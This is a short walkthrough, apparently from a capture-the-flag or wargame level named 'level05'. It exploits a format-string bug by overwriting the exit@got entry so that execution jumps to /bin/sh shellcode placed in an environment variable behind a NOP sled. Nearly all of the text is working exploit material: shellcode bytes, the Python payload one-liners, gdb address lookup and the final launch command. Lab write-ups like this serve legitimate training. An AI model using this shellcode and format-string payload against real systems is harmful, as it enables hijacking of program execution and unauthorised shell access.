We need to identify exit@got pointer

exit@got    = 0x080497e0

Then we find our shellcode to inject:

shellcode   = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80
inject it into the env with:

python -c "print '\x90' * 420 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80'"

The nopsled is arbitrary as long as it overflows the env entry into another address

Then launch level05 with gdb, breakpoint at main, then do:

x/200s environ

To check where in the memory the shellcode entry is located, choose the last one

For example: 0xffffd8b6

Now quit gdb and convert both half of the adress into decimal values:


ffff = 65535
d8b6 = 55478

Substract both to get the range

65535 - 55478 = 10057

Now we have everything we need,; just build the payload like this:

python -c "print '\xe0\x97\x04\x08' + '\xe2\x97\x04\x08' + '%55470x' + '%10$n' + '%10057x' + '%11$n'" > /tmp/level05

And now as usual:

cat /tmp/level05 - | ./level05
